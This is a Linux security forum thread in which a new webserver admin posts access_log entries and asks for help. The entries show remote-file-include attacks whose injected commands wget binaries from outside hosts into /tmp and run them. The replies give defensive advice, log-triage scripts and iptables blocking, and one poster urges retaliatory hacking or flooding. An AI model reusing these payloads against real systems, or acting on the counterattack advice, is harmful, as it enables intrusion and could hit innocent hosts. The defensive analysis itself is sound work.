Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
Old 06-10-2006, 11:17 PM   #1
drkstr
Senior Member
 
Registered: Feb 2006
Location: Seattle, WA: USA
Distribution: Slackware 11.0
Posts: 1,191

Rep: Reputation: 45
How do I go about reporting an attempt to compromise my host?


OK, so I am about 6 months into Linux and I decided it was time to put up a webserver. Just out of curiosity, I reviewed my access_log today and found some pretty interesting stuff. I am by no means an expert on all of this, but it appears that someone (multiple people actually), among other things, attempted to use injection to navigate to my /tmp directory to exploit its world-writable permissions to download and execute a script.

Code:
217.141.108.138 - - [04/Jun/2006:00:25:03 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%201q2w3.xhost.ro/m3du;chmod%20744%20m3du;./m3du%20217.127.64.53%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 287
217.141.108.138 - - [04/Jun/2006:00:25:05 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%201q2w3.xhost.ro/m3du;chmod%20744%20m3du;./m3du%20217.127.64.53%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 286
217.141.108.138 - - [04/Jun/2006:00:25:06 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%201q2w3.xhost.ro/m3du;chmod%20744%20m3du;./m3du%20217.127.64.53%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 293
217.141.108.138 - - [04/Jun/2006:00:25:08 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%201q2w3.xhost.ro/m3du;chmod%20744%20m3du;./m3du%20217.127.64.53%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 291
217.141.108.138 - - [04/Jun/2006:00:25:10 -0500] "POST /xmlrpc.php HTTP/1.1" 404 287
217.141.108.138 - - [04/Jun/2006:00:25:12 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 404 294
217.141.108.138 - - [04/Jun/2006:00:25:13 -0500] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 300
217.141.108.138 - - [04/Jun/2006:00:25:15 -0500] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 297

....
65.110.43.170 - - [07/Jun/2006:01:10:35 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 287
65.110.43.170 - - [07/Jun/2006:01:10:36 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 286
65.110.43.170 - - [07/Jun/2006:01:10:37 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 293
65.110.43.170 - - [07/Jun/2006:01:10:38 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 291
65.110.43.170 - - [07/Jun/2006:01:10:39 -0500] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 302
65.110.43.170 - - [07/Jun/2006:01:10:40 -0500] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 297
65.110.43.170 - - [07/Jun/2006:01:10:42 -0500] "POST /xmlrpc.php HTTP/1.1" 404 287
65.110.43.170 - - [07/Jun/2006:01:10:44 -0500] "POST /blog/xmlrpc.php HTTP/1.1" 404 292
65.110.43.170 - - [07/Jun/2006:01:10:45 -0500] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 299
65.110.43.170 - - [07/Jun/2006:01:10:46 -0500] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 300
65.110.43.170 - - [07/Jun/2006:01:10:47 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 404 294
65.110.43.170 - - [07/Jun/2006:01:10:48 -0500] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 300
65.110.43.170 - - [07/Jun/2006:01:10:49 -0500] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 297
65.110.43.170 - - [07/Jun/2006:01:10:50 -0500] "POST /xmlrpc.php HTTP/1.1" 404 287
65.110.43.170 - - [07/Jun/2006:01:10:52 -0500] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 294
65.110.43.170 - - [07/Jun/2006:01:10:53 -0500] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 294
66.249.72.171 - - [07/Jun/2006:05:00:06 -0500] "GET /robots.txt HTTP/1.1" 404 287
IRC ports?
Code:
69.16.172.3 - - [01/Jun/2006:07:00:40 -0500] "CONNECT 69.16.172.2:6667 HTTP/1.0" 405 302
69.16.172.3 - - [01/Jun/2006:07:00:40 -0500] "POST http://69.16.172.2:6667/ HTTP/1.0" 405 299
I have no idea what this is, but it doesn't look too malicious.
Code:
213.203.248.196 - - [31/May/2006:17:42:17 -0500] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 303
213.203.248.196 - - [31/May/2006:17:42:17 -0500] "GET /adxmlrpc.php HTTP/1.0" 404 277
213.203.248.196 - - [31/May/2006:17:42:18 -0500] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 286
213.203.248.196 - - [31/May/2006:17:42:18 -0500] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 287
213.203.248.196 - - [31/May/2006:17:42:18 -0500] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 287
213.203.248.196 - - [31/May/2006:17:42:19 -0500] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 284
213.203.248.196 - - [31/May/2006:17:42:19 -0500] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 281
213.203.248.196 - - [31/May/2006:17:42:20 -0500] "GET /ads/adxmlrpc.php HTTP/1.0" 404 281
213.203.248.196 - - [31/May/2006:17:42:20 -0500] "GET /xmlrpc.php HTTP/1.0" 404 275
213.203.248.196 - - [31/May/2006:17:42:21 -0500] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 282
213.203.248.196 - - [31/May/2006:17:42:21 -0500] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 282
Are these hack attempts? Is there a way to tell if they were successful or not? I'm assuming all the 404's are a good thing, but then again, I am pretty new to this stuff. If these are hack attempts, I find it pretty amazing that so many people would be interested in my piddly little webserver with nothing important on it. Did I sleep with the wrong person's daughter or something?

If anyone could help me make sense of these logs, and give some advice on what I need to do from here, I would greatly appreciate it.

thanks for your time!
...drkstr

**edit**
Oops, I forgot to ask my primary question.
Assuming this is an attempt to compromise my system, what kind of tools can I use to A) figure out who is doing it, and B) prevent them from doing it in the future?

thanks again!
**edit**

Last edited by drkstr; 06-11-2006 at 01:46 AM.
 
Old 06-11-2006, 10:36 AM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3603
Quote:
Just out of curiosity, I review my access_log today
Ahhh... better review logs regularly. Achieve max mana by hardening the box first, regular updating and backups and using auditing tools like a file integrity checker (Aide, Samhain, md5deep or even tripwire), your distro's package manager (if it has verification functionality), Tiger, Chkrootkit, Rootkit Hunter and reporting tools like Logwatch, swatch etc, etc.


Quote:
it appears that someone (multiple people actually) among other things, attempted
Yes, it's always heartwarming to see that out of the gazillion boxen around they take interest in *yours*, innit? ;-p


Quote:
Are these hack attempts?
H^HCracking attempts, yes.


Quote:
Is there a way to tell if they were successful or not? I'm assuming all the 404's are a good thing
In general you would be looking for vulnerabilities in the webserver (or more likely applications running on top of it: PHP-based apps are notorious for being flawed), rogue processes that run with the UID of the webserver, binaries and scripts in accessible temp dirs (lsof), processes with "typical" string contents like wget (see mod_security), processes using files that are deleted (lsof), and to some lesser extent setuid root binaries in accessible temp dirs, rootkits. Yes, four-oh-fours are good.


Quote:
Assuming this is an attempt to compromise my system. What kind of tools can I use to A) figure out who is doing it, and B) prevent them from doing it in the future.
Tools and methods mentioned above. Prevention means taking away chances. This is best done starting with a box in pristine state. Check out the LQ FAQ: Security references, post #1 under securing and hardening. Best to read, draw a plan and discuss it.
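An added example (not from the thread or from unSpawn) of the first check implied above: one awk pass over an access_log that picks out the request shapes in the posted logs (remote-include URLs carrying a wget command, xmlrpc.php POSTs, CONNECT to an IRC port) and separates the ones the server rejected with a 404/405 from any that drew a 2xx and therefore need a closer look. The sample log is constructed from shortened versions of the thread's lines plus one made-up 200 response.

```shell
#!/bin/sh
# Added example, not from the thread: triage an Apache access_log for the
# request patterns in the posted logs and flag any that the server did not
# reject, since a 404/405 means the target script was not even there.

# Constructed sample (common log format), shortened from the thread's lines,
# plus one made-up 200 response so the "needs a look" path is exercised.
SAMPLE_ACCESS_LOG="$(mktemp)"
cat > "$SAMPLE_ACCESS_LOG" <<'EOF'
217.141.108.138 - - [04/Jun/2006:00:25:03 -0500] "GET /index2.php?option=com_content&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%201q2w3.xhost.ro/m3du HTTP/1.1" 404 287
217.141.108.138 - - [04/Jun/2006:00:25:10 -0500] "POST /xmlrpc.php HTTP/1.1" 404 287
69.16.172.3 - - [01/Jun/2006:07:00:40 -0500] "CONNECT 69.16.172.2:6667 HTTP/1.0" 405 302
198.51.100.4 - - [08/Jun/2006:02:00:00 -0500] "GET /blog/index2.php?mosConfig_absolute_path=http://198.51.100.9/c.gif?&cmd=wget%20x HTTP/1.1" 200 512
66.249.72.171 - - [07/Jun/2006:05:00:06 -0500] "GET /robots.txt HTTP/1.1" 404 287
EOF

# classify_requests LOGFILE
# Prints "<ip> <status> <tag> <verdict>" for each request that matches one of
# the patterns; everything else (robots.txt, normal pages) is skipped.
classify_requests() {
    awk -F'"' '
        {
            split($1, head, " "); ip = head[1]      # client address
            req = $2                                # "METHOD /path HTTP/x.y"
            split($3, rest, " "); status = rest[1]  # response code
            tag = ""
            if (req ~ /mosConfig_absolute_path=http/ || req ~ /cmd=.*(wget|curl|chmod)/)
                tag = "rfi-cmd-injection"
            else if (req ~ /^POST [^ ]*xmlrpc\.php/)
                tag = "xmlrpc-probe"
            else if (req ~ /^CONNECT [^ ]*:6667/)
                tag = "proxy-to-irc"
            if (tag == "") next
            # A 2xx only means a script answered; it still has to be checked
            # by hand (lsof, process list, /tmp contents) as the post says.
            verdict = (status ~ /^2/) ? "INVESTIGATE" : "rejected"
            print ip, status, tag, verdict
        }
    ' "$1"
}

# investigate LOGFILE: just the entries where the server answered 2xx.
investigate() {
    classify_requests "$1" | awk '$4 == "INVESTIGATE"'
}

classify_requests "$SAMPLE_ACCESS_LOG"
```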
 
Old 06-11-2006, 12:40 PM   #3
drkstr
Senior Member
 
Registered: Feb 2006
Location: Seattle, WA: USA
Distribution: Slackware 11.0
Posts: 1,191

Original Poster
Rep: Reputation: 45
Wow, the "LQ FAQ: Security references" looks like a great resource! Thanks for taking the time to compile all of that information. I see I have some reading to do, so I will post back if I can't figure something out.

Quote:
Ahhh... better review logs regularly.
Yes I can see now that this could be an important step.

Thanks again for the information!
...drkstr
 
Old 06-12-2006, 09:43 PM   #4
operator10001
Member
 
Registered: Mar 2006
Distribution: debian sarge
Posts: 222

Rep: Reputation: 30
Retaliate. Hack the hackers. Or ping the hell out of them. If it's done right, their systems will totally crash.
operator
 
Old 06-12-2006, 09:46 PM   #5
operator10001
Member
 
Registered: Mar 2006
Distribution: debian sarge
Posts: 222

Rep: Reputation: 30
Retaliate. Hack the hackers. Or ping the hell out of them. If it's done right, their systems will totally crash.
operator
 
Old 06-12-2006, 10:29 PM   #6
gilead
Senior Member
 
Registered: Dec 2005
Location: Brisbane, Australia
Distribution: Slackware64 14.0
Posts: 4,141

Rep: Reputation: 168
Quote:
Originally Posted by operator10001
Retaliate. Hack the hackers. Or ping the hell out of them. If it's done right, their systems will totally crash.
operator
And if they're just unwittingly hosting somebody else's bot, you've left yourself open to accusations of cracking for no good reason. Some of the ISPs here put no scanning, cracking, spamming type clauses in their usage policy, so you could wind up cut off from the internet - that would definitely hurt me.
 
Old 06-12-2006, 11:47 PM   #7
operator10001
Member
 
Registered: Mar 2006
Distribution: debian sarge
Posts: 222

Rep: Reputation: 30
Oh ok. Why didn't I think of that? Those rules are very seldom enforced. The net is an anarchy.
 
Old 06-13-2006, 01:14 AM   #8
imagineers7
Member
 
Registered: Mar 2006
Distribution: BackTrack, RHEL, FC, CentOS, IPCop, Ubuntu, 64Studio, Elive, Dream Linux, Trix Box
Posts: 310

Rep: Reputation: 30
Best way,

Create an automated response for abuse@XXXX
which is to be picked from log files automatically.


(Make them look into the matter by sending as many mails as there are log entries.)
 
Old 06-13-2006, 01:19 AM   #9
drkstr
Senior Member
 
Registered: Feb 2006
Location: Seattle, WA: USA
Distribution: Slackware 11.0
Posts: 1,191

Original Poster
Rep: Reputation: 45
Thanks for the advice, but I would rather spend my time figuring out how to secure my own box instead of figuring out how to crack some lamo script kiddie's box. Not that I am against your idea, in fact I think it would be sweet sweet justice, I just think I would benefit more from spending the time to learn good security techniques. Maybe when I am more knowledgeable in this topic I can figure out a way to set up countermeasures to route their own commands back to them. I would find it pretty hysterical if I got a script kiddie to try and hack his own box without realizing it.

regards,
...drkstr
 
Old 06-13-2006, 01:34 AM   #10
//////
Member
 
Registered: Nov 2005
Location: Land of Linux :: Finland
Distribution: Pop!_OS && Windows 10 && Arch Linux
Posts: 831

Rep: Reputation: 350
You could patch your iptables/kernel with the mirror target and use it temporarily when you are getting hits to an ssh port.
 
Old 06-13-2006, 01:42 AM   #11
imagineers7
Member
 
Registered: Mar 2006
Distribution: BackTrack, RHEL, FC, CentOS, IPCop, Ubuntu, 64Studio, Elive, Dream Linux, Trix Box
Posts: 310

Rep: Reputation: 30
Hello everyone,


@//////,

It took a lot of time to measure the "/"s.
Hey, but what's that mirroring /|\ thing?
 
Old 06-13-2006, 01:45 AM   #12
imagineers7
Member
 
Registered: Mar 2006
Distribution: BackTrack, RHEL, FC, CentOS, IPCop, Ubuntu, 64Studio, Elive, Dream Linux, Trix Box
Posts: 310

Rep: Reputation: 30
Hi guys,

I had heard somewhere that we could pretend to be NT boxes over the Internet; does anybody have an idea? Also, I had heard that there are some daemons which pretend to be cracked, crashed and collapsed and then notify us about everything that the cracker did. I had found some, but they were the oldest possible versions, which are of no use now (kernel 2.0.xx).
 
Old 06-13-2006, 03:00 AM   #13
//////
Member
 
Registered: Nov 2005
Location: Land of Linux :: Finland
Distribution: Pop!_OS && Windows 10 && Arch Linux
Posts: 831

Rep: Reputation: 350
That mirror target switches source and destination fields in packets and resends them, so if someone tries to bruteforce port 22 and you use mirror target he will be cracking himself.
 
Old 06-13-2006, 03:04 AM   #14
drkstr
Senior Member
 
Registered: Feb 2006
Location: Seattle, WA: USA
Distribution: Slackware 11.0
Posts: 1,191

Original Poster
Rep: Reputation: 45
Quote:
Create an automated response for abuse@XXXX
which is to be picked from log files automatically.
Good idea.

I was hoping to try and set something up that would automatically detect intrusion attempts and log the IP in a &^#@* list. As a countermeasure, I could then hopefully configure my iptables to check this list prior to any rule checking and route all traffic back to them if it finds a match in the list.

Does anyone know if it is possible to do this with iptables?

thanks for the help!
...drkstr
 
Old 06-13-2006, 03:32 AM   #15
imagineers7
Member
 
Registered: Mar 2006
Distribution: BackTrack, RHEL, FC, CentOS, IPCop, Ubuntu, 64Studio, Elive, Dream Linux, Trix Box
Posts: 310

Rep: Reputation: 30
Hello darkstar,

We obviously can do it with the simplest of scripts.

I haven't created it yet, but we can grep as follows:-

To check root user ssh fail
Quote:
grep "Failed password for root" /var/log/messages | gawk -F: '{print $4}' | gawk -F" " '{print $6}' | sort | uniq -c
To check illegal usernames such as "test"
Quote:
grep "Failed password for illegal" /var/log/messages | gawk -F: '{print $4}' | gawk -F" " '{print $8}' | sort | uniq -c
To check for ssh scan:-
Quote:
grep "Did not receive identification string from" /var/log/messages | gawk '{print $12}' | sort | uniq -c
The file may be /var/log/messages or /var/log/secure; other things remain the same.

And we get a good list (superb candidates). Redirect this to a list and then
iptables -I INPUT -s xx.x.x.x -j DROP

The risk involved is: what if you enter wrong passwords?
So better make it count the no. of tries.
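An added example (not from the thread and not imagineers7's own script) that takes the three greps above one step further: a single awk pass over a constructed sshd log counts failures per source address across all three message shapes, and only addresses at or above a threshold are turned into the DROP rule shown above, which is the "count the no. of tries" safeguard. The rules are printed for review rather than executed.

```shell
#!/bin/sh
# Added example, not from the thread: count failed sshd logins per source
# across the three patterns in the greps above, and only emit DROP rules for
# sources at or above a threshold, so one mistyped password is not enough.

# Constructed sample standing in for /var/log/messages or /var/log/secure.
SAMPLE_AUTH_LOG="$(mktemp)"
cat > "$SAMPLE_AUTH_LOG" <<'EOF'
Jun 13 01:00:01 web sshd[1201]: Failed password for root from 10.0.0.5 port 4001 ssh2
Jun 13 01:00:02 web sshd[1202]: Failed password for root from 10.0.0.5 port 4002 ssh2
Jun 13 01:00:03 web sshd[1203]: Failed password for illegal user test from 10.0.0.5 port 4003 ssh2
Jun 13 01:00:04 web sshd[1204]: Did not receive identification string from 10.0.0.9
Jun 13 01:00:05 web sshd[1205]: Failed password for drkstr from 192.168.1.20 port 5000 ssh2
Jun 13 01:00:06 web sshd[1206]: Accepted password for drkstr from 192.168.1.20 port 5000 ssh2
EOF

# count_ssh_failures LOGFILE
# Prints "<count> <ip>" per source, highest first. The address is taken as
# the word after "from", which works for all three message shapes, so there
# is no need for the per-pattern $6/$8/$12 field numbers.
count_ssh_failures() {
    awk '
        /sshd\[[0-9]+\]: Failed password for/ ||
        /sshd\[[0-9]+\]: Did not receive identification string from/ {
            for (i = 1; i <= NF; i++)
                if ($i == "from") { hits[$(i + 1)]++; break }
        }
        END { for (ip in hits) print hits[ip], ip }
    ' "$1" | sort -rn
}

# candidates LOGFILE THRESHOLD: sources with at least THRESHOLD failures.
candidates() {
    count_ssh_failures "$1" | awk -v min="$2" '$1 >= min { print $2 }'
}

# block_rules LOGFILE THRESHOLD: the thread's DROP rule per candidate,
# printed for review rather than run (a real rule set would also exempt
# your own addresses and expire old entries).
block_rules() {
    candidates "$1" "$2" | sed 's/^/iptables -I INPUT -s /; s/$/ -j DROP/'
}

block_rules "$SAMPLE_AUTH_LOG" 3
```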
 
All times are GMT -5.